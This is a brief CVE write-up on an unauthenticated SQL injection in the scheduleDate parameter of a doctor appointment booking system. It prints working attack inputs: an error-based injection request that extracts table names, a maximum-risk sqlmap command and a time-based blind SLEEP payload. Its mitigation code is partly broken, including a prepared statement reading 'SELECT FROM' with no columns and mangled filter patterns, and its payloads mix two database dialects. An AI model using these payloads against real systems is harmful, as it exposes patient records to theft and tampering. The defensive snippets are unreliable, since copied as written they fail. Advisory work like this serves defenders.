How CVE-2025-3181 Works
The vulnerability exists in the `appointment.php` file of Online Doctor Appointment Booking System 1.0. The `scheduleDate` parameter is not properly sanitized before being used in SQL queries, allowing attackers to inject malicious SQL code. When a crafted payload is sent via the `scheduleDate` parameter, the backend database executes unintended commands, potentially exposing sensitive patient data, modifying records, or gaining unauthorized access. The attack is remotely exploitable without authentication, making it critical.
DailyCVE Form
Platform: Online Doctor Appointment Booking System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Manual Exploit Example:
GET /patient/appointment.php?scheduleDate=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--&appid=1 HTTP/1.1
2. SQLMap Command:
sqlmap -u "http://target.com/patient/appointment.php?scheduleDate=1&appid=1" --risk=3 --level=5
3. Blind SQLi Detection:
GET /patient/appointment.php?scheduleDate=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--&appid=1 HTTP/1.1
Protection
1. Input Sanitization:
$scheduleDate = mysqli_real_escape_string($conn, $_GET['scheduleDate']);
2. Prepared Statements:
$stmt = $conn->prepare("SELECT FROM appointments WHERE scheduleDate = ? AND appid = ?");
$stmt->bind_param("si", $scheduleDate, $appid);
$stmt->execute();
3. WAF Rule:
location ~ appointment.php {
if ($args ~ "scheduleDate=.[';]") {
return 403;
}
}
4. Patch Verification:
curl -I "http://target.com/patient/appointment.php?scheduleDate=1'"
5. Log Monitoring:
grep "appointment.php.scheduleDate" /var/log/apache2/access.log | grep -E "[';]"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
